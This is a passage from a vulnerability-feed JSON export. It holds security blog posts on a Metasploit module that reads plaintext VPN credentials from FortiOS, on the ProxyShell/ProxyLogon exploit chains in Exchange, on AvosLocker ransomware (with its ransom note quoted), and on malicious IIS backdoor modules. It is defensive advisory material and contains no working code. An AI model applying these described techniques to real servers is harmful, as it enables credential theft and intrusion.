10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-36942"], "modified": "2021-08-12T21:08:43", "id": "RAPID7BLOG:03B1EB65D8A7CFE486943E2472225BA1", "href": "https://blog.rapid7.com/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-05T23:34:05", "description": "## FortiOS Path Traversal\n\n\n\nReturning community contributor [mekhalleh](<https://github.com/mekhalleh>) submitted a module targeting a path traversal vulnerability within the SSL VPN web portal in multiple versions of FortiOS. The flaw is leveraged to read the usernames and passwords of currently logged in users which are stored in plaintext on the file system. This vulnerability is identified as [CVE-2018-13379](<https://attackerkb.com/topics/VEc81wfDS7/cve-2018-13379-path-traversal-in-fortinet-fortios?referrer=blog>) and can be reliably exploited remotely, without any authentication. Despite the fact that the vulnerability is several years old, CVE-2018-13379 is still known to be [exploited in the wild](<https://attackerkb.com/topics/VEc81wfDS7/cve-2018-13379-path-traversal-in-fortinet-fortios?referrer=blog>), including in [state-sponsored attacks](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>) targeting U.S. government agencies and infrastructure.\n\n## Additional Module Updates\n\nTwo modules received improvements to their targeting capabilities. The ever-popular exploit for [MS17-010](<https://attackerkb.com/topics/xI1y9OoEgq/cve-2017-0144-ms17-010?referrer=blog>) was updated by [zerosum0x0](<https://github.com/zerosum0x0>) (one of the original authors) with an updated fingerprint for properly targeting Windows Storage Server 2008. This allows the exploit module to be used against affected versions of that Server 2008 variant. Additionally, a KarjaSoft Sami FTP exploit was updated by long-time community contributor [bcoles](<https://github.com/bcoles>) who made a number of improvements to it but notably updated the exploit to only rely on an offset within a DLL that is distributed with the vulnerable software. When memory corruption exploits need the address of a POP, POP, RET instruction (as this one does for the SEH overwrite), they are more reliable when referencing one that is distributed with the software and won\u2019t change, unlike libraries that come with the host operating system and are regularly updated.\n\n## New Modules (1)\n\n * [FortiOS Path Traversal Credential Gatherer](<https://github.com/rapid7/metasploit-framework/pull/14518>) by lynx (Carlos Vieira) and mekhalleh (RAMELLA S\u00e9bastien), which exploits a directory traversal vulnerability (CVE-2018-13379) in the SSL VPN web portal of FortiOS 5.4.6 to 5.4.12, FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 to grab the `/dev/cmdb/sslvpn_websession` file, containing the plaintext list of currently connected usernames and their associated passwords. These credentials can then be saved to the `creds` database for use in future attacks.\n\n## Enhancements and features\n\n * [#14783](<https://github.com/rapid7/metasploit-framework/pull/14783>) from [bcoles](<https://github.com/bcoles>) The KarjaSoft Sami FTP Server v2.0.2 USER Overflow module has been updated with documentation, RuboCop updates, support for the AutoCheck mixin to automatically check if a target is vulnerable, an updated list of authors, as well as improvements to its exploit strategy that allow it to use only one offset within a DLL shipped with the target for exploitation, instead of relying on an Windows OS DLL whose offsets could change as the OS was updated.\n * [#14838](<https://github.com/rapid7/metasploit-framework/pull/14838>) from [zerosum0x0](<https://github.com/zerosum0x0>) The `psexec_ms17_010.rb` library has been updated to support additionally fingerprinting Windows Storage Server 2008 R2 targets as potentially exploitable targets, thereby allowing users to exploit Windows Storage Server 2008 R2 targets vulnerable to MS17-010.\n\n## Bugs Fixed\n\n * [#14816](<https://github.com/rapid7/metasploit-framework/pull/14816>) from [dwelch-r7](<https://github.com/dwelch-r7>) Ensures that the `Faker` library is always available for use within modules when generating fake data for bypassing WAF etc.\n * [#14821](<https://github.com/rapid7/metasploit-framework/pull/14821>) from [space-r7](<https://github.com/space-r7>) The `search` command within Meterpreter has had its logic updated to support searches that start at the root directory, aka `/`. These types of searches were previously not returning any results due to a logic bug within the code, which has now been fixed.\n * [#14840](<https://github.com/rapid7/metasploit-framework/pull/14840>) from [dwelch-r7](<https://github.com/dwelch-r7>) Removes `require rex/ui` statement that prevented execution of `msfrpc`.\n * [#14843](<https://github.com/rapid7/metasploit-framework/pull/14843>) from [dwelch-r7](<https://github.com/dwelch-r7>) With the upgrade to zeitwerk in Metasploit, PseudoShell was not being picked up appropriately, resulting in some modules and tools not being able to load it when needed. A fix has now been applied to make sure that PseudoShell can be appropriately loaded by zeitwerk to prevent missing dependency issues.\n * [#14853](<https://github.com/rapid7/metasploit-framework/pull/14853>) from [adfoster-r7](<https://github.com/adfoster-r7>) Fixes an edge case when upgrading from an older version of Metasploit to Metasploit 6.0.32 when using the Mac Metasploit Omnibus installer directly or indirectly via Brew\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.32...6.0.33](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-02-25T11%3A27%3A42-06%3A00..2021-03-04T11%3A16%3A38-06%3A00%22>)\n * [Full diff 6.0.32...6.0.33](<https://github.com/rapid7/metasploit-framework/compare/6.0.32...6.0.33>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-03-05T17:20:43", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0144", "CVE-2018-13379"], "modified": "2021-03-05T17:20:43", "id": "RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A", "href": "https://blog.rapid7.com/2021/03/05/metasploit-wrap-up-101/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-19T19:46:39", "description": "\n\nThe past few weeks have shown us the importance and wide reach of open-source security. In December 2021, public disclosure of the [Log4Shell vulnerability in Log4j](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>), an open-source logging library, caused a cascade of dependency analysis by developers in organizations around the world. The incident was so wide-reaching that representatives from federal agencies and large private-sector companies gathered on January 13, 2022, at a [White House meeting](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/01/13/readout-of-white-house-meeting-on-software-security/>) to discuss initiatives for securing open-source software.\n\nA large percentage of the software we rely on today is proprietary or closed-source, meaning that the software is fully controlled by the company and closed for independent review. But in most cases, all of the code written to build the proprietary software is not entirely produced by the companies that provide the products and services; instead, they use a third-party library or a component piece of software to help them assemble their solution.\n\nMany of those third-party components are classified as open-source software, meaning the source code is freely available for anyone to use, view, change to correct issues, or enhance to add new functionality. Open-source software projects are frequently maintained by volunteers, and a community of developers and users forms around a shared passion for the software. It\u2019s their passion and collaboration that help projects grow and remain supported. \n\n## Finding the resources for open-source security\n\nYet for the majority of open-source projects that do not have a large corporate backer, the role these individuals play is frequently overlooked by software consumers, and as a result, many open-source projects face maintenance challenges.\n\nLimited resources impose a variety of constraints on projects, but the implications are particularly wide-reaching when we look at the challenge of securing open-source software. Vulnerabilities discovered in proprietary software are the responsibility of the software vendor, frequently better funded than open-source software, with teams available to triage and resolve defects. Better **\u2014** or any **\u2014** funding, or broader community participation, may also increase the chance of avoiding vulnerabilities during development or discovering them during quality assurance checks. It can also help developers more quickly identify and resolve vulnerabilities discovered at a future date.\n\nIncreasing open-source project funding is a wonderful idea, and it\u2019s in the best interest of companies using such software to build their products and services. However, funding alone won\u2019t increase security in open-source projects, just as the greater source code visibility in open-source hasn\u2019t necessarily resulted in fewer defects or shortened times between defect introduction and resolution. \n\nFor example, the vulnerability in Microsoft\u2019s Server Message Block (SMB) protocol implementation ([CVE-2017-0144](<https://attackerkb.com/topics/xI1y9OoEgq/cve-2017-0144-ms17-010?referrer=blog>)) was around for many years before the defect was resolved in 2017. Similarly, the Log4Shell ([CVE-2021-44228](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis?referrer=blog>)) vulnerability in the Log4j project was introduced in 2013, and it remained undiscovered and unresolved until December 2021. There is clearly a massive difference in both funding and available resources to those involved in these projects, and yet both were able to have vulnerable defects exist for years before resolution.\n\n## Solving the problem at the source (code)\n\nAccidental software vulnerabilities share similar root causes whether they\u2019re found in proprietary or open-source software. When developers create new features or modify existing ones, we need code reviews that look beyond feature functionality confirmation. We need to inspect the code changes for security issues but also perform a deeper analysis, with attention to the security implications of these changes within the greater scope of the complete project.\n\nThe challenge is that not all developers are security practitioners, and that is not a realistic expectation. The limited resources of open-source projects compound the problem, increasing the likelihood that contribution reviews focus primarily on functionality. We should encourage developer training in secure coding practices but understand that mistakes are still possible. That means we need processes and tooling to assist with secure coding.\n\nSecurity in open-source software carries some other unique challenges due to the open environment. Projects tend to accept a wide variety of contributions from anyone. A new feature might not have enough of a demand to get time from the primary developers, but anyone who takes the time to develop the feature while staying within the bounds of the project\u2019s goals and best practices may very well have their contribution accepted and merged into the project. Projects may find themselves the target of malicious contributions through covert defect introduction. The project may even be sabotaged by a project maintainer, or the original maintainer may want to retire from the project and end up handing it over to another party that **\u2014** intentionally or not **\u2014** introduces a defect.\n\nIt\u2019s important for us to identify open-source projects that are critical to the [software supply chain](<https://www.rapid7.com/blog/post/2021/10/22/2022-planning-designing-effective-strategies-to-manage-supply-chain-risk/>) and ensure these projects are sustainably maintained for the future. These goals would benefit from increased adoption of secure coding practices and infrastructure that ensures secure distribution and verification of software build artifacts.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-19T18:02:43", "type": "rapid7blog", "title": "Open-Source Security: Getting to the Root of the Problem", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2021-44228"], "modified": "2022-01-19T18:02:43", "id": "RAPID7BLOG:2FFDE45F01FA44216BE91DD7AFA0D060", "href": "https://blog.rapid7.com/2022/01/19/open-source-security-getting-to-the-root-of-the-problem/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2022-03-21T21:27:45", "description": "The FBI has issued an[ advisory](<https://www.ic3.gov/Media/News/2022/220318.pdf>) about the AvosLocker ransomware. Notably the FBI has noticed that several victims have reported Microsoft Exchange Server vulnerabilities as the intrusion vector. \n\nAvosLocker is a Ransomware as a Service (RaaS) affiliate-based group that has targeted victims across multiple critical infrastructure sectors in the United States including financial services, critical manufacturing, and government facilities.\n\n## Threat profile\n\nAvosLocker ransomware is a multi-threaded Windows executable written in C++ that runs as a console application and shows a log of actions performed on victim systems. AvosLocker ransomware encrypts files on a victim\u2019s server and renames them with the \u201c.avos\u201d extension.\n\nThe AvosLocker executable leaves a ransom note called GET_YOUR_FILES_BACK.txt in all directories where encryption occurs. The ransom note includes a .onion site that contains instructions for paying the ransom and receiving a decryption key.\n\n\n\n> _Attention!_\n> \n> _Your systems have been encrypted, and your confidential documents were downloaded._\n> \n> _In order to restore your data, you must pay for the decryption key &amp; application._\n> \n> _You may do so by visiting us at &lt;onion address&gt;._\n> \n> _This is an onion address that you may access using Tor Browser which you may download at <https://www.torproject.org/download/>_\n> \n> _Details such as pricing, how long before the price increases and such will be available to you once you enter your ID presented to you below in this note in our website._\n> \n> _Contact us soon, because those who don\u2019t have their data leaked in our press release blog and the price they\u2019ll have to pay will go up significantly._\n> \n> _The corporations whom don\u2019t pay or fail to respond in a swift manner have their data leaked in our blog, accessible at &lt;onion address&gt;_\n\nSo, besides encrypting your files, AvosLocker also exfiltrates data and threatens to publish the stolen data to its leaks site. The public leak site not only lists victims of AvosLocker, along with a sample of data allegedly stolen from the victim\u2019s network, but also gives visitors an opportunity to view a sample of victim data and to purchase that data.\n\nThe FBI also notes that in some cases, AvosLocker victims receive phone calls from an AvosLocker representative. The caller encourages the victim to go to the .onion site to negotiate, and threatens to post stolen data online. In some cases, AvosLocker actors will threaten and execute distributed denial-of-service (DDoS) attacks during negotiations.\n\n## Exchange vulnerabilities\n\nSince AvosLocker is a Ransomware-as-a-Service it may depend on the affiliate which of the vulnerabilities gets used.\n\nThe Exchange Server vulnerabilities are named as: CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473, and CVE-2021-26855.\n\n[CVE-2021-31207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31207>): a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process. This is the way in.\n\n[CVE-2021-34523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523>): a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions. This is how they take control.\n\n[CVE-2021-34473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>): a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files. This allows the attacker to drop malware on the server and run it.\n\nThis is exactly the same attack chain we [described](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>) in August 2021. This chain of attack was generally referred to as ProxyShell.\n\nAnother RCE vulnerability in Exchange Server has been seen as well:\n\n[CVE-2021-26855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855>): the ProxyLogon vulnerability which we discussed in detail in our article on [Microsoft Exchange attacks causing panic as criminals go shell collecting](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>). The vulnerability allows an attacker to drop a webshell on a vulnerable Exchange Server. A web shell is a script used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Obviously, not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)\n\n## Mitigation\n\nAs we stated earlier, all these vulnerabilities have been patched. So, if you are wondering which updates to install next and you are running one or more Microsoft Exchange Server instances, starting there might be a good idea.\n\nMicrosoft\u2019s team has published a [script on GitHub](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) that can check the status of protection against ProxyLogon vulnerabilities of Exchange servers.\n\n## Detection\n\nMalwarebytes detects AvosLocker as [Ransom.AvosLocker](<https://blog.malwarebytes.com/detections/ransom-avoslocker/>).\n\n_Malwarebytes blocks Ransom.AvosLocker_\n\nStay safe, everyone!\n\nThe post [AvosLocker ransomware uses Microsoft Exchange Server vulnerabilities, says FBI](<https://blog.malwarebytes.com/ransomware/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-21T21:09:12", "type": "malwarebytes", "title": "AvosLocker ransomware uses Microsoft Exchange Server vulnerabilities, says FBI", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-21T21:09:12", "id": "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "href": "https://blog.malwarebytes.com/ransomware/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-23T18:35:00", "description": "Last Saturday the Cybersecurity and Infrastructure Security Agency issued an [urgent warning](<https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>) that threat actors are actively exploiting three Microsoft Exchange vulnerabilities\u2014[CVE-2021-34473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>), [CVE-2021-34523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523>), and [CVE-2021-31207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31207>). These vulnerabilities can be chained together to remotely execute arbitrary code on a vulnerable machine.\n\nThis set of Exchange vulnerabilities is often grouped under the name ProxyShell. Fixes were available in the [May 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-May>) issued by Microsoft. (To be more precise, the first two were patched in April and CVE-2021-31207 was patched in May.)\n\n### The attack chain\n\nSimply explained, these three vulnerabilities can be chained together to allow a remote attacker to run code on the unpatched server. Attackers use them as follows:\n\n * **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.\n * **Take control **with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.\n * **Do bad things** with CVE-2021-34523, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.\n\n### ProxyShell\n\nThe Record reports that ProxyShell has been used to [take over some 2,000 Microsoft Exchange mail servers](<https://therecord.media/almost-2000-exchange-servers-hacked-using-proxyshell-exploit/>) in just two days. This can only happen where organisations use the on-premise version of Exchange, and system administrators haven&#x27;t installed the April and May patches.\n\nWe know there are many reasons why patching is difficult, and often slow. The high number is surprising though, given the noise level about Microsoft Exchange vulnerabilities has been high since [March](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>). Although it may have been muffled by the other alarm cries about PrintNightmare, HiveNightmare, PetitPotam, and many others.\n\n### Ransomware\n\nSeveral researchers have pointed to a ransomware group named LockFile that combines ProxyShell with [PetitPotam](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/microsoft-provides-more-mitigation-instructions-for-the-petitpotam-attack/>). [Kevin Beaumont](<https://twitter.com/GossiTheDog>) has documented how his Exchange honeypot detected exploitation by ProxyShell to drop a [webshell](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>). Later, the threat actor revisited to initiate the staging of artefacts related to the LockFile ransomware. For those interested in how to identify whether their servers are vulnerable, and technical details about the stages in this attack, we highly recommend you read [Kevin Beaumont\u2019s post](<https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c>).\n\n### PetitPotam\n\nBefore we can point out how ProxyShell can lead to a full blown network-wide ransomware infection we ought to tell you more about PetiPotam. PetitPotam enables a threat actor to launch an NTLM relay attack on domain controllers.\n\nPetitPotam uses the `EfsRpcOpenFileRaw` function of the Microsoft Encrypting File System Remote Protocol (MS-EFSRPC) API. MS-EFSRPC is used for maintenance and management operations on encrypted data that is stored remotely, and accessible over a network. The PetitPotam proof-of-concept (PoC) takes the form of a manipulator-in-the-middle (MitM) attack against Microsoft\u2019s NTLM authentication system. The targeted computer is forced to initiate an authentication procedure and share its authentication details via NTLM.\n\nSince the PetitPotam attack is not based on a vulnerability but uses a legitimate function in a way that was not intended, it will be hard to patch for this attack without \u201cbreaking stuff.\u201d Further, stopping the Encrypting File System (EFS) service does not prevent the technique from being exploited. (For mitigation details, see our post about [PetitPotam](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/microsoft-provides-more-mitigation-instructions-for-the-petitpotam-attack/>).)\n\n### LockFile\n\nLockFile attacks have been recorded mostly in the US and Asia, focusing on organizations in financial services, manufacturing, engineering, legal, business services, travel, and tourism. Symantec pointed out in a [blog post](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows>) that the ransom note from LockFile ransomware is very similar to the one used by the [LockBit](<http://blog.malwarebytes.com/detections/ransom-lockbit/>) ransomware group and that they reference the Conti gang in their email address. This may mean that members of those gangs have started a new operation, or just be another indication of how all these gangs are [connected, and sharing resources and tactics](<https://blog.malwarebytes.com/ransomware/2021/04/how-ransomware-gangs-are-connected-and-sharing-resources-and-tactics/>).\n\n### Advice\n\nCISA strongly urges organizations to identify vulnerable systems on their networks and immediately apply Microsoft&#x27;s Security Update from May 2021\u2014which remediates all three ProxyShell vulnerabilities\u2014to protect against these attacks.\n\nWe would like to add that you have a look at the mitigation advice for PetitPotam and prioritize tackling these problems in your updating processes.\n\nStay safe, everyone!\n\nThe post [Patch now! Microsoft Exchange is being attacked via ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-23T13:21:08", "type": "malwarebytes", "title": "Patch now! Microsoft Exchange is being attacked via ProxyShell", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-23T13:21:08", "id": "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-27T16:38:26", "description": "The [Microsoft 365 Defender Research Team](<https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/>) has warned that attackers are increasingly leveraging Internet Information Services (IIS) extensions as covert backdoors into servers.\n\nIIS extensions are able to stay hidden in target environments and as such provide a long-term persistence mechanism for attackers.\n\n## IIS\n\nIIS is webserver software created by Microsoft that runs on Windows systems. Most commonly, organizations use IIS to host ASP.NET web applications and static websites. It can also be used as an FTP server, host WCF services, and be extended to host web applications built on other platforms such as PHP.\n\nExchange Server 2016 and Exchange Server 2019 automatically configure multiple Internet Information Services (IIS) virtual directories during the server installation. As a result, administrators are not always aware of the origin of some directories and their functionality.\n\n## IIS modules\n\nThe IIS 7 and above web server feature set is componentized into more than thirty independent modules. A module is either a Win32 DLL (native module) or a .NET 2.0 type contained within an assembly (managed module). Similar to a set of building blocks, modules are added to the server in order to provide the desired functionality for applications.\n\nMalicious IIS modules are near perfect backdoors. Once installed, they will respond to specifically crafted HTTP requests sent by the operator instructing the server to collect emails, add further malicious access, or use the compromised servers for clandestine purposes. These requests will seem normal to the unsuspicious eye.\n\n## IIS backdoors\n\nIIS backdoors are harder to detect since they mostly reside in the same directories as legitimate modules, and they follow the same code structure as clean modules. The actual backdoor code is hard to detect as such and that also makes it hard to determine the origin.\n\n## ProxyLogon and ProxyShell\n\nSome of the methods used to drop malicious IIS extensions are known as [ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>) and [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>). ProxyLogon consists of four vulnerabilities which can be combined to form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, the attackers deploy web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\nThe ProxyShell exploit is very similar to ProxyLogon and was discovered more recently. ProxyShell is a different attack chain designed to exploit three separate vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207.\n\n## Malicious behavior\n\nOn its blog, the Microsoft Team describes a custom IIS backdoor called FinanceSvcModel.dll which has a built-in capability to perform Exchange management operations, such as enumerating installed mailbox accounts and exporting mailboxes for exfiltration. What&#x27;s interesting in this example is how the threat actor forced the system to use the WDigest protocol for authentication, resulting in lsass.exe retaining a copy of the user\u2019s plaintext password in memory. This allowed the threat actor to steal the actual passwords and not just the hashes.\n\nCredential stealing can be a goal by itself. But stolen credentials also allow the attackers to remain persistent in the environment, even if the primary backdoor is detected. Credential stealing modules monitor for specific requests to determine a sign-in activity and dump the provided credentials in a file the threat actor can retrieve later.\n\nGiven the rising energy prizes and the falling, yet still profitable, cryptocurrency exchange rates, we wouldn\u2019t be surprised to find servers abused for cryptomining. A few years ago we saw threat actors leveraging an [IIS 6.0 vulnerability](<https://www.bleepingcomputer.com/news/security/windows-servers-targeted-for-cryptocurrency-mining-via-iis-flaw/>) to take over Windows servers and install a malware strain that mined the Electroneum cryptocurrency.\n\n## Mitigation, detection, and remediation\n\nThere are several thing you can do to minimize the risk and consequences of a malicious IIS extension:\n\n * Keep your server software up to date to minimize the risk of infection.\n * Use security software that also covers your servers.\n * Regularly check loaded IIS modules on exposed IIS servers (notably Exchange servers), leveraging existing tools from the IIS servers suite.\n * Deploy a backup strategy that creates regular backups that are easy to deploy when needed.\n * Review permission and access policies, combined with credential hygiene.\n * Prioritize alerts that show patterns of server compromise. It can help to catch attacks in the exploratory phase, the period in which attackers spend time exploring the environment after gaining initial access.\n\nStay safe, everyone!\n\nThe post [IIS extensions are on the rise as backdoors to servers](<https://blog.malwarebytes.com/reports/2022/07/iis-extensions-are-on-the-rise-as-backdoors-to-servers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-27T13:58:06", "type": "malwarebytes", "title": "IIS extensions are on the rise as backdoors to servers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-07-27T13:58:06", "id": "MALWAREBYTES:B0F2474F776241731FE08EA7972E6239", "href": "https://blog.malwarebytes.com/reports/2022/07/iis-extensions-are-on-the-rise-as-backdoors-to-servers/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-29T18:23:40", "description": "A joint Cybersecurity Advisory, coauthored by cybersecurity authorities of the United States (CISA, NSA, and FBI), Australia (ACSC), Canada (CCCS), New Zealand (NZ NCSC), and the 